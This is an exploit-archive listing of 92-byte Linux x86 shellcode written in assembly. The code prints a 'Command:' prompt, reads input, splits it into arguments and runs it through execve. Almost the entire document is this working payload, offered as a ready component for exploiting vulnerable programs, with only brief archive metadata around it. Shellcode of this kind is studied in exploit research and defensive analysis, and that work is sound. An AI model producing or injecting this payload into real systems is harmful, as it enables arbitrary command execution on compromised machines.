linux/x86 execve read shellcode - 92 bytes

2006-11-20T00:00:00
ID 1337DAY-ID-7190
Type zdt
Reporter 0ut0fbound
Modified 2006-11-20T00:00:00

Description

Exploit for linux/x86 platform in category shellcode

                                        
                                            ==========================================
linux/x86 execve read shellcode - 92 bytes
==========================================






#    XCHG Research Group
#    Linux/x86 execve read shellcode - 92 bytes


.text

	.globl _start

_start:

# EAX = 0x04 -> syscall write()
	xorl %eax, %eax
	movb $0x4, %al
	xorl %ebx, %ebx
	inc %ebx
	pushl $0x20202020
	pushl $0x3a646e61
	pushl $0x6d6d6f43
	movl %esp, %ecx
	xorl %edx, %edx
	movb $0x9, %dl
	int $0x80 
	
# EAX = 0x03 -> syscall read()
	xorl %eax, %eax
	movb $0x3, %al
	xorl %ebx, %ebx
	xorl %edx, %edx
	movb $0x20, %dl
	subl %edx, %esp
	movl %esp, %ecx
	int $0x80 
	
# buffer[read(0, buffer, sizeof(buffer))] = 0;
	addl %eax, %ecx
	dec %ecx 
	movl %ebx, (%ecx)
	
	movl %esp, %ebx
	addl %eax, %ebx
	movl %eax, %ecx
	
	xorl %edx, %edx
	push %edx 
	
LOOP1: 
	movb (%ebx), %al
	cmp $0x20, %al
	jne CONT 
	xorb $0x20, (%ebx)
	inc %ebx 
	pushl %ebx 
	dec %ebx 
CONT: 
	dec %ebx 
loop LOOP1 
	
	push %ebx 
	
	movl %esp, %ecx
	xorl %eax, %eax
	movb $0xb, %al
	
	int $0x80 
	
# EAX = 0x01 -> syscall exit
	xorl %eax, %eax
	inc %al 
	xorl %ebx, %ebx
	int $0x80 



#  0day.today [2016-04-19]  #